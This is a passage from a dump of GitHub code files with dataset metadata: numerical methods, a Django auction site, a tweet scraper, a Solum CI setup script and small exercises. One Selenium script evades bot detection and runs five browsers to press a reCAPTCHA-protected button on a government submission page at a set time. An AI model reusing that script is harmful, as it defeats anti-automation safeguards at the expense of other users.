a[k,index]==0: #singular matrix\n return k\n \n if index!=k:\n swap(a,n,k,index)\n \n for i in range(k+1,n):\n r = a[i,k]/a[k,k]\n for j in range(k+1,n+1):\n a[i,j] = a[i,j]-a[k,j]*r\n a[i,k]=0\n print(a)\n return -1\n\n#Function to perform backward substitution and find the x values\ndef back_substitution(a,n):\n solution = np.zeros((n))\n for i in range(n-1,-1,-1):\n solution[i]=a[i,n]\n for j in range(i+1,n):\n solution[i] = solution[i] - a[i,j]*solution[j]\n solution[i] = solution[i]/a[i,i]\n print(solution)\n \n#Taking user input of the size of square matrix\nn=int(input(\"Number of rows (=columns) : \"))\n\n#Initialising the augmented matrix for AX=B\na= np.zeros((n,n+1))\n\n#User input of Augmented matrix entries\nprint('Enter Augmented Matrix Coefficients:')\nfor i in range(n):\n for j in range(n+1):\n a[i][j] = int(input( 'a['+str(i)+']['+ str(j)+']='))\n\ngauss_elimination(a,n)","repo_name":"Srinidi-V/Scientific-Computing","sub_path":"Solving_Linear_Equations/gaussElimination.py","file_name":"gaussElimination.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27535490406","text":"import torch\r\n\r\n# the filename of the output trained model features\r\nmodel_name = \"train_model_features.pt\"\r\n\r\n# Device configuration\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# size of the embedding output and input for lstm\r\ninput_size = 65\r\n\r\n# the number of hidden nodes in the LSTM model\r\nhidden_size = 512\r\n\r\n# max length of the output string during Sampling\r\nmax_seg_length = 30\r\n","repo_name":"philgookang/simple_bilstm_model","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22849642077","text":"from calculate_distance import haversine_distance \nimport csv\nimport numpy as np\n\n\n#レビュー数を読み込みこむ\nreview_num_path = \"data\\\\number_of_review\\\\岡山_numOfRview.csv\"\nwith open(review_num_path,\"r\",encoding=\"utf-8\") as f_r:\n reader = csv.reader(f_r)\n spot_and_numOfrev = {row[0]: int(row[1]) for row in reader}\nmax_review_num = max(spot_and_numOfrev.values())\n\n\n#スコアが高いtop nスポットのスポットを返却\n#spots_info = [[spot_name_1, [lat_1,lng_1], [aspects_1],[asp_vectors_1],[cluster_vectors_1],[spots_aspectsVector_float_1],spot_numOfRev], ... ]\n#形式は[[spot_name,[lat,lng],aspects,score], ...]\ndef return_spot(selected_lat, selected_lng, recommend_range, selected_aspect_list, spots_info,n):\n recommend_spots_info = []\n for spot_info in spots_info:\n sn = spot_info[0]\n lat = spot_info[1][0]\n lng = spot_info[1][1]\n aspect_list = spot_info[2]\n asp_vec_list = spot_info[3]\n cluster_vec_list = spot_info[4]\n spots_aspectsVector = spot_info[5]\n spot_numOfRev = spot_info[6]\n if haversine_distance(selected_lat,selected_lng,lat,lng) <= recommend_range:\n score = calc_spot_score(selected_aspect_list, spots_aspectsVector, spot_numOfRev)\n recommend_spots_info.append([sn,[lat,lng],aspect_list,score])\n sorted_recommend_spots_info = sorted(recommend_spots_info, key = lambda x:x[-1],reverse=True)\n if len(sorted_recommend_spots_info) <= n:\n print(\"return_spot : \" ,sorted_recommend_spots_info)\n return sorted_recommend_spots_info\n else:\n print(\"return_spot : \" ,sorted_recommend_spots_info[0:n])\n return sorted_recommend_spots_info[0:n]\n\ndef cos_sim(v1, v2):\n if v1 != [0.0]*len(v1) and v2 != [0.0]*len(v2) :\n return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n else:\n return 0.0\ndef return_selected_aspectsVector(selected_aspect_list):\n read_clustering_path = \"data\\\\all_aspect_clustering\\\\岡山aspect_clustering_result.csv\"\n #全ての観点のクラスタリング結果から、選択した観点のベクトルを生成\n list_aspects = []\n with open(read_clustering_path, 'r', newline='', encoding='utf-8') as csvfile:\n csv_reader = csv.reader(csvfile)\n for row in csv_reader:\n # 各行の要素数を取得\n list_aspects.append(row[1:])\n selected_aspectsVector = [0.0]*len(list_aspects)\n for index in range(len(list_aspects)):\n for selected_aspect in selected_aspect_list:\n if selected_aspect in list_aspects[index]:\n selected_aspectsVector[index] += 1\n return selected_aspectsVector\n\n\ndef calc_spot_score(selected_aspect_list, spots_aspectsVector, spot_numOfRev):\n score = 0.0\n selected_aspectsVector = return_selected_aspectsVector(selected_aspect_list)\n similarity = cos_sim(selected_aspectsVector,spots_aspectsVector)\n if spot_numOfRev != None:\n popularity = spot_numOfRev/max_review_num\n score = popularity * similarity\n return score\n","repo_name":"RAnu-0512/recommend_travel","sub_path":"return_spot.py","file_name":"return_spot.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41828466458","text":"# usage: python get_english_1M.py \r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport utils.twitter_api\r\nfrom twitter.error import TwitterError\r\nimport click\r\n\r\n\r\npairs_re = re.compile(r'([a-z ]+)=([A-Za-z0-9 ]+)')\r\n\r\ndef get_tweet(row):\r\n id = row['TweetID']\r\n try:\r\n tweet = utils.twitter_api.api.GetStatus(id)\r\n print('retrieving tweet for ID %d' % int(id))\r\n return tweet\r\n except TwitterError:\r\n return np.NaN\r\n\r\n\r\ndef load_data():\r\n dfs = []\r\n with open(tsv) as infile:\r\n df = pd.DataFrame([dict(pairs_re.findall(l)) for l in infile])\r\n df = df.rename(columns={'id': 'TweetID'})\r\n df.to_csv(tsv + '.csv', encoding='utf-8')\r\n\r\n return df\r\n\r\n\r\ndef get_info(s):\r\n try:\r\n fields = {'Text': s.text, 'Retweeted': s.retweeted, 'Handle': s.user.screen_name}\r\n except AttributeError:\r\n fields = {'Text': np.NaN, 'Retweeted': np.NaN, 'Handle': np.NaN}\r\n\r\n return pd.Series(fields)\r\n\r\n\r\ndef populate_tweets(df, output_dir):\r\n split_dfs = np.array_split(df, 450) # split dataframe into 450 chunks\r\n for i, df_chunk in enumerate(split_dfs):\r\n status = df_chunk.apply(get_tweet, axis=1)\r\n new = status.apply(get_info)\r\n result = pd.concat([df_chunk, new], axis=1)\r\n # save result to disk\r\n outfile = os.path.join(output_dir, 'English_1M_%d.csv' % i)\r\n result.to_csv('English_1M_%d.csv' % i, encoding='utf-8')\r\n\r\n\r\n\r\n@click.command()\r\n@click.option('--tsv', default='English_1M.tsv', help='The .tsv file from Volkova, Wilson, & Yarowsky (2013).')\r\n@click.option('--output_dir', help='The output folder to store the bunch of .csv files containing the tweets.')\r\ndef command(**kwargs):\r\n data = load_data(tsv)\r\n populate_tweets(data, output_dir)\r\n\r\nif __name__ == '__main__':\r\n command()\r\n","repo_name":"schan27/twitter-capitalization","sub_path":"data/get_english_1M.py","file_name":"get_english_1M.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39068531781","text":"import os\nimport string\nimport sys\nimport json\n\nfrom tapipy.tapis import Tapis\n\nINSTANCE = os.environ.get(\"INSTANCE\")\nTENANT = os.environ.get(\"TENANT\")\ntapis_service_token = os.environ.get(\"TAPIS_SERVICE_TOKEN\")\nbase_url = os.environ.get(\"AGAVE_BASE_URL\", \"https://api.tacc.utexas.edu\")\ntapis_base_url = os.environ.get(\"TAPIS_BASE_URL\", \"https://tacc.tapis.io\")\nv2_token_url = os.environ.get(\"V2_TOKEN_URL\", \"https://tacc.develop.tapis.io/v3/oauth2/v2/token\")\ndatabase = os.environ.get(\"TAPIS_DATABASE\")\ncollection = os.environ.get(\"TAPIS_COLLECTION\")\n\nif not tapis_service_token:\n raise Exception(\"Missing TAPIS_SERVICE_TOKEN configuration.\")\n\n\ndef get_config_metadata_name():\n \"\"\"Return name of config metadata\"\"\"\n return f\"config.{TENANT}.{INSTANCE}.jhub\"\n\n\ndef get_tenant_configs():\n \"\"\"Retrive tenant config from metadata\"\"\"\n t = Tapis(base_url=tapis_base_url, jwt=tapis_service_token)\n q = {\"name\": get_config_metadata_name()}\n print(f\"tenant query: {q}\")\n metadata = json.loads(\n t.meta.listDocuments(db=database, collection=collection, filter=json.dumps(q))\n )[0][\"value\"]\n return metadata\n\n\ndef get_user_configs(username):\n \"\"\"Retrieve any groups user belongs to\"\"\"\n t = Tapis(base_url=tapis_base_url, jwt=tapis_service_token)\n q = {\"value.user\": username, \"value.tenant\": TENANT, \"value.instance\": INSTANCE}\n print(f\"user query: {q}\")\n metadata = json.loads(\n t.meta.listDocuments(db=database, collection=collection, filter=json.dumps(q))\n )\n return metadata\n\n\ndef safe_string(\n to_escape, safe=None, escape_char=\"-\"\n):\n \"\"\"Escape a string so that it only contains characters in a safe set.\n Characters outside the safe list will be escaped with _%x_,\n where %x is the hex value of the character.\n \"\"\"\n if safe is None:\n safe = set(string.ascii_lowercase + string.digits)\n chars = []\n for c in to_escape:\n if c in safe:\n chars.append(c)\n else:\n chars.append(_escape_char(c, escape_char))\n return \"\".join(chars)\n\n\nif sys.version_info >= (3,):\n\n def _ord(byte):\n return byte\n\n\nelse:\n _ord = ord\n\n\ndef _escape_char(c, escape_char):\n \"\"\"Escape a single character\"\"\"\n buf = []\n for byte in c.encode(\"utf8\"):\n buf.append(escape_char)\n buf.append(f\"{_ord(byte)}\")\n return \"\".join(buf)\n","repo_name":"scinco-project/jhub","sub_path":"jupyterhub/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9971240248","text":"\"\"\"\r\n067\r\nFaça um programa que mostre a tabuada de vários numeroes, um de cada vez, para cada valor digitado\r\nO programa será interrompido quando o número solicitado for negativo.\r\n\"\"\"\r\n\r\ndef tabuada (num):\r\n for i in range(11):\r\n x = num * i\r\n output = str(num) + \" X \" + str(i) + \" = \" + str(x)\r\n print(\"{:^25}\".format(output))\r\n #print(\"{:<2} X {:>2} = {:>3}\".format(num, i, x))\r\n\r\n\r\n\r\nwhile True:\r\n n = int(input(\"Digite um numero: \"))\r\n if n < 0:\r\n break\r\n texto = \"Tabuada de \" + str(n)\r\n print(\"{:=^25}\".format(texto))\r\n tabuada(n)\r\n print(\"=\"*25)","repo_name":"vitorsemidio-dev/curso-python-guanabara","sub_path":"Desafios/Aula 015/ex067.py","file_name":"ex067.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4627095192","text":"import os\nimport time\nimport threading\nimport undetected_chromedriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom concurrent.futures import ThreadPoolExecutor\nimport csv\n\n\ndef get_undetected_chromedriver():\n # Обход защиты\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\n '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36')\n\n chrome_options.add_argument('--disable-blink-features=AutomationControlled')\n chrome_options.add_argument(\"--disable-gpu\")\n chrome_options.add_argument(\"--start-maximized\")\n # chrome_options.add_argument('--headless')\n \"\"\"Проба\"\"\"\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument(\"--disable-setuid-sandbox\")\n\n\n driver = undetected_chromedriver.Chrome()\n\n return driver\n\n\ndef open_url():\n url = \"https://publicbg.mjs.bg/BgSubmissionDoc\"\n driver = get_undetected_chromedriver()\n driver.maximize_window()\n driver.get(url)\n next_button = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//input[@class=\"btn btn-default g-recaptcha\"]')))\n start_button = driver.find_element(By.XPATH, '//input[@class=\"btn btn-default g-recaptcha\"]')\n driver.execute_script(\"window.scrollBy(0,document.body.scrollHeight)\")\n return driver\n\ndef click_start_button():\n while True:\n now = time.localtime()\n if now.tm_hour == 11 and now.tm_min == 59 and now.tm_sec == 59: # and now.tm_msec == 800: в милисекундах\n for driver in drivers:\n start_button = driver.find_element(By.XPATH, '//input[@class=\"btn btn-default g-recaptcha\"]')\n start_button.click()\n break\n time.sleep(1)\n\n# Создание и запуск 5 потоков\ndrivers = []\nfor i in range(5):\n driver = open_url()\n drivers.append(driver)\n t = threading.Thread(target=driver)\n t.start()\n\n# Запуск потока для нажатия на кнопку \"start_button\" в 11:59:59\nt = threading.Thread(target=click_start_button)\nt.start()","repo_name":"SashaZt/scrap_tutorial-master","sub_path":"Bulgaria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31458895750","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django import forms\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .models import User\nfrom .models import AuctionListing\nfrom .models import Bid\nfrom .models import Comment\n\nfrom .utils import get_highest_bid\n\nclass CreateListingForm(forms.Form):\n title = forms.CharField(label=\"Title\", max_length=64)\n description = forms.CharField(label=\"Description\", max_length=256)\n starting_bid = forms.DecimalField(decimal_places=2)\n image = forms.URLField(required=False)\n category = forms.CharField(label=\"Category\", max_length=64, required=False)\n \nclass BidOnItemForm(forms.Form):\n bid = forms.DecimalField(decimal_places=2)\n\nclass CommentForm(forms.Form):\n content = forms.CharField(label=\"leave a comment\", max_length=256, widget=forms.Textarea)\n\ndef index(request):\n listings = AuctionListing.objects.values(\"title\",\n \"description\",\n \"image\",\n \"category\")\n listings_list = [entry for entry in listings]\n\n for i, price in enumerate(AuctionListing.objects.values(\"starting_bid\")):\n listings_list[i][\"highest_bid\"] = round(get_highest_bid(listings_list[i][\"title\"]).amount / 100, 2)\n\n for i, active in enumerate(AuctionListing.objects.values(\"winner\")):\n listings_list[i][\"closed\"] = AuctionListing.objects.get(title=listings_list[i][\"title\"]).winner is not None\n\n return render(request, \"auctions/index.html\", {\n \"listings\": listings_list \n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n@login_required\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create_listing(request):\n if request.method == \"POST\":\n title = request.POST[\"title\"]\n description = request.POST[\"description\"]\n starting_bid = request.POST[\"starting_bid\"]\n image = request.POST[\"image\"]\n category = request.POST[\"category\"]\n author = request.user\n\n starting_bid = int (float(starting_bid) * 100)\n\n AuctionListing.objects.create(title=title,\n description=description,\n starting_bid=starting_bid,\n image=image,\n category=category,\n author=author)\n \n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/create-listing.html\",{\n \"form\": CreateListingForm()\n })\n\ndef view_listing(request, listing):\n if request.method == \"POST\" and request.user.is_authenticated:\n if \"bid\" in request.POST.keys():\n bid_amt = int(float(request.POST[\"bid\"]) *100)\n\n highest_bid = get_highest_bid(listing)\n\n if bid_amt > highest_bid.amount:\n bid = Bid(author=request.user,\n amount=bid_amt,\n listing=AuctionListing.objects.get(title=listing))\n bid.save()\n else:\n messages.error(request, \"Your bid must be higher than the previous bid\")\n\n return HttpResponseRedirect(request.path_info, \n listing)\n elif \"content\" in request.POST.keys():\n content = request.POST[\"content\"]\n listing_object = AuctionListing.objects.get(title=listing)\n\n Comment.objects.create(author=request.user,\n listing=listing_object,\n content=content)\n\n return HttpResponseRedirect(request.path_info, \n listing)\n\n elif not AuctionListing.objects.filter(title=listing):\n return render(request, \"auctions/listing-not-found.html\", {\n \"listing\": listing\n })\n else:\n listing = AuctionListing.objects.get(title=listing)\n\n title = listing.title\n description = listing.description\n category = listing.category\n author = listing.author\n image = listing.image\n\n highest_bid = get_highest_bid(title)\n\n if AuctionListing.objects.get(title=title).winner is not None:\n messages.success(request, \"This auction has been closed.\")\n\n if request.user.is_authenticated:\n on_watchlist = listing not in AuctionListing.objects.filter(watchlist=request.user) \n if request.user == AuctionListing.objects.get(title=title).winner:\n messages.success(request, \"Congratulations! You won this auction!\")\n else:\n on_watchlist = False\n\n comments = Comment.objects.filter(listing=listing)\n\n return render(request, \"auctions/listing.html\",{\n \"title\": title,\n \"description\": description,\n \"category\": category,\n \"author\": author,\n \"image\": image,\n \"bid_form\": BidOnItemForm,\n \"highest_bid\": round(highest_bid.amount / 100, 2),\n \"highest_bidder\": highest_bid.author,\n \"on_watchlist\": on_watchlist,\n \"comment_form\": CommentForm,\n \"comments\": comments\n })\n\n@login_required\ndef close_listing(request, listing):\n listing_object = AuctionListing.objects.get(title=listing)\n if request.user == listing_object.author:\n listing_object.winner = get_highest_bid(listing).author\n listing_object.save()\n return HttpResponseRedirect(reverse(\"view-listing\", kwargs={'listing': listing}))\n\n@login_required\ndef watchlist(request):\n listings = AuctionListing.objects.values(\"title\",\n \"description\",\n \"image\",\n \"category\") \\\n .filter(watchlist=request.user)\n listings_list = [entry for entry in listings]\n\n for i, price in enumerate(AuctionListing.objects.values(\"starting_bid\").filter(watchlist=request.user)):\n listings_list[i][\"highest_bid\"] = round(get_highest_bid(listings_list[i][\"title\"]).amount / 100, 2)\n\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": listings_list\n })\n\n@login_required\ndef watchlist_add(request, listing):\n listing_object = AuctionListing.objects.get(title=listing)\n if listing_object not in AuctionListing.objects.filter(watchlist=request.user):\n listing_object.watchlist.add(request.user)\n\n return HttpResponseRedirect(reverse(\"watchlist\"))\n\n@login_required\ndef watchlist_remove(request, listing):\n listing_object = AuctionListing.objects.get(title=listing)\n if listing_object in AuctionListing.objects.filter(watchlist=request.user):\n listing_object.watchlist.remove(request.user)\n\n return HttpResponseRedirect(reverse(\"watchlist\"))\n\ndef category_list(request):\n category_list_raw = AuctionListing.objects.values(\"category\").filter(winner=None)\n\n category_list_processed = []\n for category in category_list_raw:\n if category[\"category\"] not in category_list_processed \\\n and len(category[\"category\"]) != 0:\n category_list_processed.append(category[\"category\"])\n\n return render(request, \"auctions/category-list.html\", {\n \"categories\": category_list_processed,\n })\n\ndef category(request, category):\n \n listings = AuctionListing.objects.values(\"title\",\n \"description\",\n \"image\",\n \"category\").filter(category=category)\n listings_list = [entry for entry in listings]\n\n for i, price in enumerate(AuctionListing.objects.values(\"starting_bid\").filter(category=category)):\n listings_list[i][\"highest_bid\"] = round(get_highest_bid(listings_list[i][\"title\"]).amount / 100, 2)\n\n for i, active in enumerate(AuctionListing.objects.values(\"winner\").filter(category=category)):\n listings_list[i][\"closed\"] = AuctionListing.objects.get(title=listings_list[i][\"title\"]).winner is not None\n\n return render(request, \"auctions/category.html\", {\n \"listings\": listings_list,\n \"category\": category\n })\n","repo_name":"blattgoldowo/cs50w-project2","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26305810706","text":"# -*- coding:utf-8 -*-\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution:\n # 先计算两个链表的长度,找出长度差。\n # 然后让指针现在长链表上走出长度差的距离\n def FindFirstCommonNode(self, pHead1, pHead2):\n node1 = pHead1\n node2 = pHead2\n count1 = count2 = 0\n while node1:\n count1 += 1\n node1 = node1.next\n while node2:\n count2 += 1\n node2 = node2.next\n count_dif = count1 - count2\n if count_dif > 0:\n longList = pHead1\n shortList = pHead2\n else:\n count_dif = -count_dif\n longList = pHead2\n shortList = pHead1\n while count_dif:\n longList = longList.next\n count_dif -= 1\n while longList and shortList:\n if longList == shortList:\n return longList\n longList = longList.next\n shortList = shortList.next\n return None\n","repo_name":"czq1994/-offer-python2.7-","sub_path":"两个链表的第一个公共结点.py","file_name":"两个链表的第一个公共结点.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"38901547341","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 717.py\n# @Time : 2019/12/21 22:47\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n \"\"\"\n [717. 1比特与2比特字符](https://leetcode-cn.com/problems/1-bit-and-2-bit-characters/)\n \"\"\"\n @timeit\n def isOneBitCharacter(self, bits: List[int]) -> bool:\n n = len(bits)\n # 总是0结尾\n if n == 1: return True\n if bits[-2] == 0: return True\n if n > 2:\n j = n - 2\n while bits[j] == 1: j -= 1\n return (n - 2 - j) % 2 == 0\n return False\n\nif __name__ == '__main__':\n a = Solution()\n a.isOneBitCharacter([1,0,0])\n a.isOneBitCharacter([1,1,1,0])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/601-900/717.py","file_name":"717.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"75145978491","text":"import argparse\nimport base64\nimport getpass\nimport json\nimport os\nimport random\nimport re\nimport string\nimport tempfile\n\nimport httplib2\nimport six\nimport yaml\n\nfrom solumclient import client as solum_client\nfrom solumclient.common import cliutils\n\n\nSOLUM_API_VERSION = '1'\nCREDENTIALS = {}\nPLAN_TEMPLATE = {\"version\": 1,\n \"name\": \"chef\",\n \"description\": \"chef testy\",\n \"artifacts\": []}\n\n\ndef _get_solum_client():\n args = {}\n args['os_username'] = os.getenv('OS_USERNAME', '')\n args['os_password'] = os.getenv('OS_PASSWORD', '')\n args['os_tenant_name'] = os.getenv('OS_TENANT_NAME', '')\n args['os_auth_url'] = os.getenv('OS_AUTH_URL', '')\n args['solum_url'] = os.getenv('SOLUM_URL', '')\n\n try:\n client = solum_client.get_client(SOLUM_API_VERSION, **args)\n return client\n except Exception as ex:\n print(\"Error in getting Solum client: %s\" % ex)\n exit(1)\n\n\ndef _get_token(git_url):\n # Get an OAuth token with the scope of 'repo' for the user\n if git_url in CREDENTIALS and 'token' in CREDENTIALS[git_url]:\n return CREDENTIALS[git_url]['token']\n\n repo_pat = re.compile(r'github\\.com[:/](.+?)/(.+?)($|/$|\\.git$|\\.git/$)')\n match = repo_pat.search(git_url)\n if match:\n user_org_name = match.group(1)\n repo = match.group(2)\n else:\n print('Failed parsing %s' % git_url)\n exit(1)\n\n full_repo_name = '/'.join([user_org_name, repo])\n username = six.moves.input(\"Username for repo '%s' [%s]: \" %\n (full_repo_name, user_org_name))\n if not username:\n username = user_org_name\n password = getpass.getpass(\"Password: \")\n # TODO(james_li): add support for two-factor auth\n CREDENTIALS[git_url] = {}\n CREDENTIALS[git_url]['user'] = username\n CREDENTIALS[git_url]['password'] = password\n CREDENTIALS[git_url]['full_repo'] = full_repo_name\n\n http = httplib2.Http()\n auth = base64.encodestring(username + ':' + password)\n headers = {'Authorization': 'Basic ' + auth,\n 'Content-Type': 'application/json'}\n # 'note' field has to be unique\n note = 'Solum-status-' + ''.join(random.sample(string.lowercase, 5))\n data = {'scopes': 'repo', 'note': note}\n\n # TODO(james_li): make the url configurable\n resp, content = http.request('https://api.github.com/authorizations',\n 'POST', headers=headers,\n body=json.dumps(data))\n\n if resp['status'] == '201' or resp['status'] == '200':\n content_dict = json.loads(content)\n CREDENTIALS[git_url]['token'] = str(content_dict['token'])\n return CREDENTIALS[git_url]['token']\n else:\n print('Failed to get token from Github')\n exit(1)\n\n\ndef _filter_trigger_url(url):\n filtered_url = url\n url_pattern = re.compile(r'^(http://)(.+)')\n match = url_pattern.search(url)\n if match:\n filtered_url = ''.join(['https://', match.group(2)])\n else:\n print('Cannot filter trigger url, to use the original one')\n return filtered_url\n\n\ndef get_planfile(git_uri, app_name, cmd, public):\n plan_dict = dict.copy(PLAN_TEMPLATE)\n plan_dict['name'] = app_name\n plan_dict['description'] = git_uri # Put repo uri as plan desc.\n arti = {\"name\": \"chef\", \"artifact_type\": \"chef\",\n \"content\": {}, \"language_pack\": \"auto\"}\n arti['content']['href'] = git_uri\n if not public:\n arti['content']['private'] = True\n arti['unittest_cmd'] = cmd\n plan_dict['artifacts'].append(arti)\n\n # Create a Github token and insert it into plan file\n for arti in plan_dict['artifacts']:\n arti['status_token'] = _get_token(arti['content']['href'])\n plan_file = tempfile.NamedTemporaryFile(suffix='.yaml',\n prefix='solum_',\n delete=False)\n plan_file.write(yaml.dump(plan_dict, default_flow_style=False))\n plan_file_name = plan_file.name\n plan_file.close()\n return plan_file_name\n\n\ndef create_plan(client, plan_file):\n cmd = ['solum', 'app', 'create', plan_file]\n print(' '.join(cmd))\n with open(plan_file) as definition_file:\n definition = definition_file.read()\n\n plan = client.plans.create(definition)\n fields = ['uuid', 'name', 'description', 'uri']\n data = dict([(f, getattr(plan, f, ''))\n for f in fields])\n cliutils.print_dict(data, wrap=72)\n\n if data['uri'] is None:\n print('Error: no uri found in plan creation')\n exit(1)\n\n # get public keys in the case of private repos\n artifacts = getattr(plan, 'artifacts', [])\n for arti in artifacts:\n content = getattr(arti, 'content', {})\n if 'public_key' in content and 'href' in content:\n CREDENTIALS[content['href']]['pub_key'] = content['public_key']\n\n return data['uri']\n\n\ndef create_assembly(client, app_name, plan_uri):\n cmd = ['solum', 'assembly', 'create', app_name, plan_uri]\n print(' '.join(cmd))\n assembly = client.assemblies.create(name=app_name, plan_uri=plan_uri)\n\n fields = ['uuid', 'name', 'description', 'status', 'application_uri',\n 'trigger_uri']\n data = dict([(f, getattr(assembly, f, ''))\n for f in fields])\n cliutils.print_dict(data, wrap=72)\n\n trigger_uri = data['trigger_uri']\n if trigger_uri is None:\n print('Error in trigger uri')\n exit(1)\n\n return trigger_uri\n\n\ndef create_webhook(trigger_uri):\n # Create github web hooks for pull requests\n for key in CREDENTIALS.keys():\n user = CREDENTIALS[key]['user']\n password = CREDENTIALS[key]['password']\n auth = base64.encodestring(user + ':' + password)\n http = httplib2.Http()\n # TODO(james_li): make this url configurable\n github_url = ('https://api.github.com/repos/%s/hooks' %\n CREDENTIALS[key]['full_repo'])\n headers = {'Authorization': 'Basic ' + auth,\n 'Content-Type': 'application/json'}\n data = {'name': 'web',\n 'events': ['pull_request', 'commit_comment'],\n 'config': {'content_type': 'json',\n 'url': trigger_uri}}\n\n resp, _ = http.request(github_url, 'POST',\n headers=headers,\n body=json.dumps(data))\n\n if resp['status'] != '201' and resp['status'] != '200':\n print(\"Failed to create web hooks\")\n print(\"Make sure you have access to repo '%s'\" % key)\n exit(1)\n\n\ndef add_ssh_keys(args):\n if args.public:\n return\n\n # add public keys\n for key in CREDENTIALS.keys():\n if ('pub_key' in CREDENTIALS[key] and\n CREDENTIALS[key]['pub_key'] is not None):\n user = CREDENTIALS[key]['user']\n password = CREDENTIALS[key]['password']\n auth = base64.encodestring(user + ':' + password)\n http = httplib2.Http()\n if args.user_key:\n # TODO(james_li): make the url configurable\n github_url = 'https://api.github.com/user/keys'\n else:\n github_url = ('https://api.github.com/repos/%s/keys' %\n CREDENTIALS[key]['full_repo'])\n headers = {'Authorization': 'Basic ' + auth,\n 'Content-Type': 'application/json'}\n data = {'title': 'devops@Solum',\n 'key': CREDENTIALS[key]['pub_key']}\n\n resp, _ = http.request(github_url, 'POST',\n headers=headers,\n body=json.dumps(data))\n\n if resp['status'] != '201' and resp['status'] != '200':\n if args.user_key:\n print(\"Failed to add a ssh key to the account %s\" % user)\n else:\n print(\"Failed to add a deploy key to the repo %s\" % key)\n exit(1)\n\n\ndef validate_args(args):\n if len(args.command) == 0 or len(args.git_uri) == 0:\n print(\"Please input for --test-cmd and --git-uri\")\n exit(1)\n\n # try to use a correct git uri\n pat = re.compile(r'github\\.com[:/](.+?)/(.+?)($|/.*$|\\.git$|\\.git/.*$)')\n match = pat.search(args.git_uri)\n if match:\n user_org_name = match.group(1)\n repo = match.group(2)\n if args.public:\n correct_uri = 'https://github.com/%s/%s' % (user_org_name, repo)\n else:\n correct_uri = 'git@github.com:%s/%s.git' % (user_org_name, repo)\n return correct_uri\n else:\n print(\"The input git uri seems not right\")\n if args.public:\n print(\"The correct format is: https://github.com//\")\n else:\n print(\"The correct format is: git@github.com:/.git\")\n exit(1)\n\n\ndef main(args):\n git_uri = validate_args(args)\n client = _get_solum_client()\n plan_file = get_planfile(git_uri, args.app_name, args.command, args.public)\n print('\\n')\n print(\"************************* Starting setup *************************\")\n print('\\n')\n plan_uri = create_plan(client, plan_file)\n add_ssh_keys(args)\n try:\n os.remove(plan_file)\n except OSError:\n print('Cannot remove %s. Skip and move 